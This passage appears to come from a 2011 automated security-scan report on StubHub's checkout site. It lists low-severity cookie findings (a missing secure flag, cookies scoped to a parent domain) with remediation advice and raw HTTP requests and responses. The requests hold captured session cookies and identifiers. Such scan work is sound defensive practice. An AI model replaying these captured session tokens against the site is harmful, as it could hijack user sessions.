Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 28 Oct 2010 22:25:16 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE393D239C11039317A904AB7E84BF7; Path=/; Domain=.stubhub.com


2.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/s_code_2011_01_27.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/s_code_2011_01_27.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 27 Jan 2011 22:30:08 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF10E41839C11039A5D4871236610E4F; Path=/; Domain=.stubhub.com


2.23. https://buy.stubhub.com/resources/css/stubhub.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /resources/css/stubhub.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/css/stubhub.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Mon, 05 Feb 2007 20:17:13 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF13009039C1103967B8D80BA34965BB; Path=/; Domain=.stubhub.com


3. Cookie scoped to parent domain  previous  next
There are 23 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:25 GMT
Server: Apache
Set-Cookie: TLTHID=D34B2BA639C11039039AC88CFE43A8B9; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


3.2. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7C